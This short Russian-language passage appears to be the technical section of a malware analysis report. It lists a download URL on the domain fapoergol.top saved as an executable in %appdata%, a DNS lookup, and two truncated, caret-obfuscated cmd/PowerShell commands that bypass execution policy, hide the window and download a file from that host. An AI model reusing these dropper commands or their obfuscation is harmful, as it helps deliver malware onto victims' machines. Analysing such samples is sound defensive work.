Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^W^e^R^she^l^L^.^eXe^ -^execUT^ioNPOliCY ^bYp^ASs -nO^prOF^il^E -wINDow^sT^yL^E ^hId^DEN^ (^NeW-O^bJ^Ec^t s^YsTEM.^n^et.wE^B^cLieNt^).D^OWnlO^A^D^FiLe(^'http://www.fapoergol.to...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "Po^W^e^R^she^l^L^.^eXe^ -^execUT^ioNPOliCY ^bYp^ASs -nO^prOF^il^E -wINDow^sT^yL^E ^hId^DEN^ (^NeW-O^bJ^Ec^t s^YsTEM.^n^et.wE^B^cLieNt^).D^OWnlO^A^D^FiLe(^'http://www.fapoergol.to...' (со скрытым окном)